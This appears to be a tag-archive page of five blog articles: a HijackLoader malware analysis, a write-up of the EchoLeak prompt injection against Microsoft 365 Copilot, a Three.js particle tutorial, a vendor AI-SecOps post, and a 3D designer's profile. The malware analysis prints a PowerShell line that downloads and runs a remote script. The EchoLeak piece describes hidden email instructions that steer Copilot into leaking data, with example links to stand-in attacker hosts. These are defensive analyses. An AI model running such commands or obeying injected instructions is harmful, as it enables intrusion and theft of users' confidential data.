برچسب: The

  • An Analysis of the Clickfix HijackLoader Phishing Campaign 

    An Analysis of the Clickfix HijackLoader Phishing Campaign 


    Table of Contents 

      • The Evolving Threat of Attack Loaders 
    • Technical Methodology and Analysis 
      • Initial Access and Social Engineering 
      • Multi-Stage Obfuscation and De-obfuscation 
      • Anti-Analysis Techniques 
    • Quick Heal \ Seqrite Protection 

     

    Introduction 

    With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis. 

    We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention due to its ability to deliver payloads and its interesting techniques for loading and executing them. It mostly appears as Malware-as-a-Service, which has been observed mainly in financially motivated campaigns globally.  

    HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base. 

    Since June 2025, we have observed attackers using Clickfix  where it led unsuspecting victims to download malicious .msi installers that, in turn, resulted in HijackLoader execution. DeerStealer was observed being downloaded as the final executable on the victim’s machine then.  

    Recently, it has also been observed that TAG-150 has emerged with CastleLoader/CastleBot, while also leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem. 

    HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as: 

    • Process doppelgänging with transacted sections 
    • Direct syscalls under WOW64 

    Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks. 

    Infection Chain 

    Infection Chain

    Technical Overview 

    The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix(This technique was seen to be used by attackers in June 2025 as well). 

    Fig1: CAPTCHA-Based Phishing Page for Social Engineering
    Fig2: HTA Dropper File for Initial Execution

     This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.   

    Fig3: Initial PowerShell Loader Script

    Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below. 

    Fig4: First-Stage Obfuscated PowerShell Script

    The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays. 

    While resolving the above payload, we see it gets decoded into below command, which while still unreadable, can be fully de-obfuscated. 

    Fig5: Deobfuscation of the First stage obfuscated payload

    After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.  

    iex ((New-Object System.Net.WebClient).DownloadString(‘https://rs.mezi[.]bet/samie_bower.mp3’))  

    When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.  

    Fig6: Debugger View of Failed C2 Connection

    The file samie-bower.mp3 is another PowerShell script, which at over 18,000 lines is heavily obfuscated and represents the next stage of the loader. 

    Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

    Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.  

    Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

    These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment. 

    While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command. 

    Fig9: Final execution

     The above gibberish variable declaration has been resolved; upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines, before loading another PowerShell script that likely injects the PE file.  

    Fig10: Intermediate PowerShell Script for PE Injection
    Fig11: Base64-Encoded Embedded PE Payload

     

    Decoding this file reveals an embedded PE file, identifiable by its MZ header. 

    Fig12: Decoded PE File with MZ Header

    This PE file is a heavily packed .NET executable. 

    Fig13: Packed .NET Executable Payload

    The executable payload loads a significant amount of code, likely extracted from its resources section. 

    Fig14: In-Memory Unpacking of the .NET Executable

    Once unpacked, the executable payload appears to load a DLL file. 

    Fig15: Protected DLL Loaded In-Memory

    This DLL file is also protected, likely to prevent reverse engineering and analysis. 

    Fig16: DLL Protection Indicators

    HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below. 

    Fig17: Final C2 Server Connection Attempt

    While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer Malware.  This HijackLoader has been involved in downloading different stealer malware including Lumma as well. 

    Conclusion 

    Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment. 

    IOCs: 

    • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
    • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
    • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
    • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
    • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
    • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
    • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
    • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
    • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
    • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
    • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
    • 91[.]212[.]166[.]51 
    • 37[.]27[.]165[.]65:1477 
    • cosi[.]com[.]ar 
    • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
    • hxxp[:]//77[.]91[.]101[.]66/ 

    Quick Heal \ Seqrite Protection: 

    • Script.Trojan.49900.GC 
    • Loader.StealerDropperCiR 
    • Trojan.InfoStealerCiR 
    • Trojan.Agent 
    • BDS/511 

    MITRE Att&ck: 

    Tactic  Technique ID  Technique Name 
    Initial Access  T1566.002  Phishing: Spearphishing Link (CAPTCHA phishing page) 
    T1189  Drive-by Compromise (malvertising, SEO poisoning, fake installers) 
    Execution  T1059.001  Command and Scripting Interpreter: PowerShell 
    Defense Evasion  T1027  Obfuscated Files or Information (multi-stage obfuscated scripts) 
    T1140  Deobfuscate/Decode Files or Information (Base64, XOR decoding) 
    T1562.001  Impair Defenses: Disable or Modify Tools (unhooking DLLs) 
    T1070.004  Indicator Removal: File Deletion (likely used in staged loaders) 
    T1211  Exploitation for Defense Evasion (direct syscalls under WOW64) 
    T1036  Masquerading (fake extensions like .mp3 for PowerShell scripts) 
    Discovery  T1082  System Information Discovery (VM checks, registry queries) 
    T1497.001  Virtualization/Sandbox Evasion: System Checks 
    Persistence  T1547.001  Boot or Logon Autostart Execution: Registry Run Keys (registry tampering) 
    Persistence / Privilege Esc.  T1055  Process Injection (PE injection routines) 
    Command and Control (C2)  T1071.001  Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic) 
    T1105  Ingress Tool Transfer (downloading additional payloads) 
    Impact / Collection  T1056 / T1005  Input Capture / Data from Local System (info-stealer functionality of final payload) 

     

    Authors: 

    Niraj Lazarus Makasare 

    Shrutirupa Banerjiee 



    Source link

  • The Silent AI Threat Hacking Microsoft 365 Copilot

    The Silent AI Threat Hacking Microsoft 365 Copilot


    Introduction:

    What if your Al assistant wasn’t just helping you – but quietly helping someone else too?

    A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

    Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

    Vulnerability Overview:

    In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

    Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

    Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

    One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.

    EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Flow:

    From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click Let’s understand  below in detail!

    1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI assisted processing. To conceal the injected instruction, the attacker uses various stealth techniques, such as: HTML comments.
    2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document—or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks—Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set. As a result, the AI executes the hidden commands At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task—thereby enabling the next stage of the attack: leakage of sensitive internal context.
    3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:

    [Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

    To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.

    1. Link Creation to Attacker-Controlled Server: The markdown hyperlink generated by Copilot—under the influence of the injected prompt—points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}

    These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.

    1. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information—such as authentication tokens, conversation snippets, or internal documentation—without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.

    Mitigation Steps:

    To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.

    1. Prompt Isolation

    One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.

    1. Input Sanitization and Validation

    All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style=”display:none;”>, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.

    1. Disable Auto-Rendering of Untrusted Content

    A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.

    1. Context Access Restriction

    Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.

    1. AI Output Monitoring and Logging

    Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.

    1. User Training and Awareness

    Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

    Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.

    References:

    https://www.aim.security/lp/aim-labs-echoleak-blogpost

    Author:

    Nandini Seth

    Adrip Mukherjee



    Source link

  • When Cells Collide: The Making of an Organic Particle Experiment with Rapier & Three.js

    When Cells Collide: The Making of an Organic Particle Experiment with Rapier & Three.js



    Every project begins with a spark of curiosity. It often emerges from exploring techniques outside the web and imagining how they might translate into interactive experiences. In this case, inspiration came from a dive into particle simulations.

    The Concept

    The core idea for this project came after watching a tutorial on creating cell-like particles using the xParticles plugin for Cinema 4D. The team often draws inspiration from 3D motion design techniques, and the question frequently arises in the studio: “Wouldn’t this be cool if it were interactive?” That’s where the idea was born.

    After building our own set up in C4D based on the example, we created a general motion prototype to demonstrate the interaction. The result was a kind of repelling effect, where the cells displaced according to the cursor’s position. To create the demo, we added a simple sphere and gave it a collider tag so that the particles would be pushed away as the sphere moved through the simulation, emulating the mouse movement. An easy way to add realistic movement is to add a vibrate tag to the collider, and play around with the movement levels and frequency until it looks good.

    Art Direction

    With the base particle and interaction demo sorted, we rendered out the sequence and moved in After Effects to start playing around with the look and feel. We knew we wanted to give the particles a unique quality, one that felt more stylised as opposed to ultra realistic or scientific. After some exploration we landed on a lo-fi gradient mapped look, which felt like an interesting direction to move forward with. We achieved this by layer up a few effects:

    • Effect > Generate > 4 Colour Gradient: Add this to a new shape layer. This black and white gradient will act as a mask to control the blur intensities.
    • Effect > Blur > Camera Blur: Add this to a new adjustment layer. This general blur will smooth out the particles.
    • Effect > Blur > Compound Blur: Add this to the same adjustment layer as above. Set the blur layer to use the same shape layer we applied to the 4 colour gradient as its mask, make sure it is set to “Effects & Mask” mode in the drop down.
    • Effect > Color Correction > Colorama: Add this as a new adjustment layer. This is where the fun starts! You can add custom gradients into the output cycle and play around with the phase shift to customise the look according to your preference.

    Next, we designed a simple UI to match the futuristic cell-based visual direction. A concept we felt would work well for a bio-tech company – so created a simple brand with key messaging to fit and voila! That’s the concept phase complete.

    (Hot tip: If you’re doing an interaction concept in 3d software like C4D, create a plane with a cursor texture on and parent it to your main interaction component – in the case, the sphere collider. Render that out as a sequence so that it matches up perfectly with your simulation – you can then layer it over text, etc, and UI in After Effects)

    Technical Approach and Tools

    As this was a simple one page static site without need of a backend, we used our in-house boilerplate using Astro with Vite and Three.js. For the physics, we went with Rapier as it handles collision detection efficiently and is compatible with Three.js. That was our main requirement, since we didn’t need simulations or soft-body calculations. 

    For the Cellular Technology project, we specifically wanted to show how you can achieve a satisfying result without overcrowding the screen with tons of features or components. Our key focus was the visuals and interactivity – to make this satisfying for the user, it needed to feel smooth and seamless. A fluid-like simulation is a good way to achieve this. At Unseen, we often implement this effect as an added interaction component. For this project, we wanted to take a slightly different approach that would still achieve a similar result.

    Based on the concept from our designers, there were a couple of directions for the implementation to consider. To keep the experience optimised, even at a large scale, having the GPU handle the majority of the calculations is usually the best approach. For this, we’d need the effect to be in a shader, and use more complicated implementations such as packing algorithms and custom voronoi-like patterns. However, after testing the Rapier library, we realised that simple rigid body object collision would suffice in re-creating the concept in real-time. 

    Physics Implementation

    To do so, we needed to create a separate physics world next to our 3D rendered world, as the Rapier library only handles the physics calculations, and the graphics are left for the implementation of the developer’s choosing. 

    Here’s a snippet from the part were we create the rigid bodies:

    for (let i = 0; i < this.numberOfBodies; i++) {
      const x = Math.random() * this.bounds.x - this.bounds.x * 0.5
      const y = Math.random() * this.bounds.y - this.bounds.y * 0.5
      const z = Math.random() * (this.bounds.z * 0.95) - (this.bounds.z * 0.95) * 0.5
    
      const bodyDesc = RAPIER.RigidBodyDesc.dynamic().setTranslation(x, y, z)
      bodyDesc.setGravityScale(0.0) // Disable gravity
      bodyDesc.setLinearDamping(0.7)
      const body = this.physicsWorld.createRigidBody(bodyDesc)
    
      const radius = MathUtils.mapLinear(Math.random(), 0.0, 1.0, this._cellSizeRange[0], this._cellSizeRange[1])
      const colliderDesc = RAPIER.ColliderDesc.ball(radius)
      const collider = this.physicsWorld.createCollider(colliderDesc, body)
      collider.setRestitution(0.1) // bounciness 0 = no bounce, 1 = full bounce
    
      this.bodies.push(body)
      this.colliders.push(collider)
    }

    The meshes that represent the bodies are created separately, and on each tick, their transforms get updated by those from the physics engine. 

    // update mesh positions
    for (let i = 0; i < this.numberOfBodies; i++) {
      const body = this.bodies[i]
      const position = body.translation()
    
      const collider = this.colliders[i]
      const radius = collider.shape.radius
    
      this._dummy.position.set(position.x, position.y, position.z)
      this._dummy.scale.setScalar(radius)
      this._dummy.updateMatrix()
    
      this.mesh.setMatrixAt(i, this._dummy.matrix)
    }
    
    this.mesh.instanceMatrix.needsUpdate = true

    With performance in mind, we first decided to try the 2D version of the Rapier library, however it soon became clear that with cells distributed only in one plane, the visual was not convincing enough. The performance impact of additional calculations in the Z plane was justified by the improved result. 

    Building the Visual with Post Processing

    Evidently, the post processing effects play a big role in this project. By far the most important is the blur, which makes the cells go from clear simple rings to a fluid, gooey mass. We implemented the Kawase blur, which is similar to Gaussian blur, but uses box blurring instead of the Gaussian function and is more performant at higher levels of blur. We applied it to only some parts of the screen to keep visual interest. 

    This already brought the implementation closer to the concept. Another vital part of the experience is the color-grading, where we mapped the colours to the luminosity of elements in the scene. We couldn’t resist adding our typical fluid simulation, so the colours get slightly offset based on the fluid movement. 

    if (uFluidEnabled) {
        fluidColor = texture2D(tFluid, screenCoords);
    
        fluid = pow(luminance(abs(fluidColor.rgb)), 1.2);
        fluid *= 0.28;
    }
    
    vec3 color1 = uColor1 - fluid * 0.08;
    vec3 color2 = uColor2 - fluid * 0.08;
    vec3 color3 = uColor3 - fluid * 0.08;
    vec3 color4 = uColor4 - fluid * 0.08;
    
    if (uEnabled) {
        // apply a color grade
        color = getColorRampColor(brightness, uStops.x, uStops.y, uStops.z, uStops.w, color1, color2, color3, color4);
    }
    
    color += color * fluid * 1.5;
    color = clamp(color, 0.0, 1.0);
    
    color += color * fluidColor.rgb * 0.09;
    
    gl_FragColor = vec4(color, 1.0);
    

    Performance Optimisation

    With the computational power required for the physics engine increasing quickly due to the number of calculations required, we aimed to make the experience as optimised as possible. The first step was to find the minimum number of cells without affecting the visual too much, i.e. without making the cells too sparse. To do so, we minimised the area in which the cells get created and made the cells slightly larger. 

    Another important step was to make sure no calculation is redundant, meaning each calculation must be justified by a result visible on the screen. To make sure of that, we limited the area in which cells get created to only just cover the screen, regardless of the screen size. This basically means that all cells in the scene are visible in the camera. Usually this approach involves a slightly more complex derivation of the bounding area, based on the camera field of view and distance from the object, however, for this project, we used an orthographic camera, which simplifies the calculations.

    this.camera._width = this.camera.right - this.camera.left
    this.camera._height = this.camera.top - this.camera.bottom
    
    // .....
    
    this.bounds = {
      x: (this.camera._width / this.options.cameraZoom) * 0.5,
      y: (this.camera._height / this.options.cameraZoom) * 0.5,
      z: 0.5
    }

    Check out the live demo.

    We’ve also exposed some of the settings on the live demo so you can adjust colours yourself here.

    Thanks for reading our break down of this experiment! If you have any questions don’t hesitate to write to us @uns__nstudio.





    Source link

  • The Missing Security Shield for Modern Threats


    Introduction: A Security Crisis That Keeps Leaders Awake

    Did you know that 97% of security professionals admit to losing sleep over potentially missed critical alerts? (Ponemon Institute) It’s not just paranoia—the risk is real. Security operations centers (SOCs) are flooded with tens of thousands of alerts daily, and missing even one critical incident can lead to catastrophic consequences.

    Take the Target breach of 2013: attackers exfiltrated 41 million payment card records, costing the company $18.5 million in regulatory settlements and long-term brand damage (Reuters). The painful truth? Alerts were generated—but overwhelmed analysts failed to act on time.

    Fast forward to 2025, and the situation is worse:

    • 3.5 million unfilled cybersecurity positions worldwide (ISC2 Cybersecurity Workforce Study 2023)

    • Average recruitment cycle of 150 days per role

    • 100,000+ daily alerts in large SOCs  as per Fortinet

    Clearly, traditional SecOps cannot keep pace. This is where Artificial Intelligence (AI) steps in—not as a luxury, but as the missing security shield.

    Why Traditional SecOps is Falling Short

    Alert Fatigue & Human Limits

    Manual triage overwhelms analysts. Studies show 81% of SOC teams cite manual investigation as their biggest bottleneck (TechTarget)—leading to burnout, mistakes, and missed detections.

    Signature-Based Detection Can’t Keep Up

    Conventional tools rely on known signatures. But attackers now deploy zero-days, polymorphic malware, and AI-generated phishing emails that evade these defenses. Gartner predicts 80% of modern threats bypass legacy signature-based systems by 2026 (Gartner Report).

    Longer Dwell Times = Bigger Damage

    Dwell time—the period attackers stay undetected—often stretches weeks to months. Verizon’s 2024 DBIR shows 62% of breaches go undetected for more than a month (Verizon DBIR 2024). During this time, attackers can steal data, deploy ransomware, or create persistent backdoors.

    Ransomware at Machine Speed

    Cybersecurity Ventures reports a ransomware attack every 11 seconds globally, with damages forecast to hit USD 265 billion annually by 2031 (Cybersecurity Ventures). Humans alone cannot fight threats at this velocity.


    How AI Bridges the Gap in SecOps

    AI isn’t replacing analysts—it’s augmenting them with superhuman speed, scale, and accuracy. Here’s how:

    1. Anomaly-Based Threat Detection

    AI establishes a baseline of normal behavior and flags deviations (e.g., unusual logins, abnormal data flows). Unlike static signatures, anomaly detection spots zero-days and advanced persistent threats (APTs).

    2. Real-Time Threat Intelligence

    AI ingests global threat feeds, correlates them with local telemetry, and predicts attack patterns before they hit. This allows SOCs to move from reactive defense to proactive hunting.

    3. Automated Alert Triage

    AI filters out noise and correlates alerts into coherent incident narratives. By cutting false positives by up to 60% (Tech Radar), AI frees analysts to focus on high-risk threats.

    4. Privilege Management & Insider Threats

    AI-driven Identity & Access Management (IAM) continuously checks user behavior against role requirements, preventing privilege creep and catching insider threats.

    5. Automated Threat Containment

    AI-powered orchestration platforms can:

    • Isolate compromised endpoints

    • Quarantine malicious traffic

    • Trigger network segmentation

    This shrinks containment windows from hours to minutes.

    6. Shadow IT Discovery

    Unauthorized apps and AI tools are rampant. AI maps shadow IT usage by analyzing traffic patterns, reducing blind spots and compliance risks.

    7. Phishing & Deepfake Defense

    Generative AI has supercharged phishing. Traditional keyword filters miss these, but AI can detect behavioral anomalies, reply-chain inconsistencies, and deepfake audio/video scams.

    8. BYOD Endpoint Protection

    AI monitors personal devices accessing corporate networks, detecting ransomware encryption patterns and isolating infected devices instantly.


    Seqrite’s AI-Powered SecOps Advantage

    Seqrite XDR Powered by GoDeep.AI

    • Uses deep learning, behavioral analytics, and predictive intelligence.

    • Reduces breach response cycles by 108 days compared to conventional methods (Seqrite internal benchmark).

    • Correlates telemetry across endpoints, networks, cloud, and identities.

    Seqrite Intelligent Assistant (SIA)

    • A GenAI-powered virtual security analyst.

    • Allows natural language queries—no complex syntax required.

    • Automates workflows like incident summaries, risk assessments, and remediation steps.

    • Cuts analyst workload by up to 50%.

    The Unified Advantage

    Traditional SOCs struggle with tool sprawl. Seqrite provides a unified architecture with centralized management, reducing complexity and cutting TCO by up to 47% (industry benchmarks).


    The Future: Predictive & Agentic AI in SecOps

    • Predictive AI: Anticipates breaches before they occur by analyzing historical + real-time telemetry.

    • Causal AI: Maps cause-effect relationships in attacks, helping SOCs understand root causes, not just symptoms.

    • Agentic AI: Autonomous agents will investigate and remediate incidents without human intervention, allowing SOC teams to focus on strategy.

    Conclusion: AI Is No Longer Optional

    Cybercriminals are already using AI to scale attacks. Without AI in SecOps, organizations risk falling hopelessly behind.

    The benefits are clear:

    • Faster detection (minutes vs weeks)

    • Reduced false positives (by up to 60%)

    • Automated containment (minutes vs hours)

    • Continuous compliance readiness

    AI is not replacing SecOps teams—it’s the missing shield that makes them unbeatable.



    Source link

  • Reality meets Emotion: The 3D Storytelling of Célia Lopez

    Reality meets Emotion: The 3D Storytelling of Célia Lopez


    Hi, my name is Célia. I’m a French 3D designer based in Paris, with a special focus on color harmony, refined details, and meticulous craftsmanship. I strive to tell stories through ground breaking interactivity and aim to create designs that truly touch people’s hearts. I collaborate with renowned agencies and always push for exemplary quality in everything I do. I love working with people who share the same dedication and passion for their craft—because that’s when results become something we can all be truly proud of.

    Featured Projects

    Aether1

    This project was carried out with the OFF+BRAND team, with whom I’ve collaborated regularly since February 2025. They wanted to use this product showcase to demonstrate to their future clients how brilliantly they combine storytelling, WebGL, AI integration, and a highly polished UI, and flawlessly coded.

    I loved working on this project not only because of the intense team effort in fine-tuning the details, but also because of the creative freedom I was given. In collaboration with Gilles Tossoukpé and Ross Anderson, we built the concept entirely from scratch, each bringing our own expertise. I’m very proud of the result.

    We have done a full case study explaining our workflow on Codrops

    aether1.ai

    My collaboration with OFF+BRAND began thanks to a recommendation from Paul Guilhem Repaux, with whom I had worked on one of the biggest projects of my career: the Dubai World Expo.

    Dubai World Expo

    We recreated over 200 pavilions from 192 countries, delivering a virtual experience for more than 2 million viewers during the inauguration of the Dubai World Expo in 2020.

    This unique experience allowed users to attend countless events, conferences, and performances without traveling to Dubai.

    To bring this to life, we worked as a team of six 3D designers and two developers, under the leadership of the project manager at DOGSTUDIO. I’m truly proud to have contributed to this website, which showcased one of the world’s most celebrated events.

    virtualexpodubai.com/

    Heidelbarg CCUS

    The following website was created with Ashfall Studio, another incredible studio whose meticulous work, down to the way they present their projects, inspires me tremendously.

    Here, our mission was nothing short of magic: transforming a website with a theme that, at first glance, wasn’t exactly appealing—tar production—into an experiential site that evokes emotion! I mean, come on, we actually managed to make tar sexy!

    ccus.heidelbergmaterials.com/en/

    Jacquemus

    Do you know the law of attraction? This principle is based on the idea that we can attract what we focus our attention and emotions on. I fell in love with the Jacquemus brand—the story of Simon, its creator, resonates deeply with me because we both grew up in the same place: the beautiful South of France!

    I wanted to create a project for Jacquemus, so I first made it a personal one. I wanted to explore the bridges between reality, 3D, photography, and motion design in one cohesive whole—which you can actually see on my Instagram, where I love mixing 3D and fashion in a harmonious and colorful feed.

    I went to their boutique on Avenue Montaigne and integrated my bag into the space using virtual reality. I also created a motion piece and did a photoshoot with a photographer.

    Céramique

    Last year, a friend of mine gave me a ceramics workshop where I created plates and cups. I loved it! Then in 2025, I decided I wanted to improve my animation skills—so I needed a subject to practice on. I was inspired by that workshop and created a short animation based on the steps involved in making my cups.

    Philosophy

    Are you one of those people who dream big—sometimes too big—and, once they commit to something, push it to the extreme of what it could become? Well, I am. If I make a ceramic plate once, I want to launch my own brand. If I invest in real estate, I want to become financially independent. If I spend my life in stylish cafés or designer gyms I discover on ClassPass, I start imagining opening a coffee shop–fitness space. When I see excellence somewhere, I think: why not me? And I give myself the means to reach my goals. But of course, one has to be realistic: to be truly high-quality, you need to focus on one thing at a time. So yes, I have many future projects—but first, let’s finish the ones already in progress.

    My next steps

    I recently launched my Airbnb in Paris, for which I’ll be creating some content, building a brand identity, and promoting it as much as I can.

    I’ve also launched my lifestyle/furniture brand called LABEGE named after the village where I grew up. For now, it’s a digital brand, but my goal is to develop it for commercialization. I have no idea how to make that happen just yet.

    Background & Career highlights


    Awwwards class

    There have been many defining moments in my career—or at least, I treat every opportunity as a potential turning point, which is why I invest so much in every project.

    But two moments, in particular, stand out for me. The first was when Awwwards invited me to create a course explaining my 3D WebGL workflow. Today, I might update it with some new insights, but at the time it was extremely valuable because there was nothing like it available online. Combined with the fact that it was one of the first four courses they launched, it gave me great visibility within our community.

    My Awwwards Class

    Spline

    Another milestone was when I joined the Spline team. Back then, the software was still unstable—it was frustrating to spend days creating only to lose all my work to a bug. But over time, the tool became incredibly powerful. The combination of Spline’s excellent social media presence and the growing strength of the software helped it grow from 5K to 75K Twitter followers in just two years, along with thousands of new users.

    Thanks to the tool’s early popularity and the small number of people who mastered it at first, I was able to build a strong reputation in the interactive 3D web field. I shared a lot about Spline on my social channels and even launched a YouTube channel dedicated to tutorials.

    It was fascinating to see how a tool is built, showcase new features to the community, and watch the enthusiasm grow. Being part of such a close-knit, human team—led by founder Alejandro, whose visionary talent inspires me—was an unforgettable experience.

    Tools & Techniques

    • Cinema 4D
    • Redshift
    • Blender
    • Figma
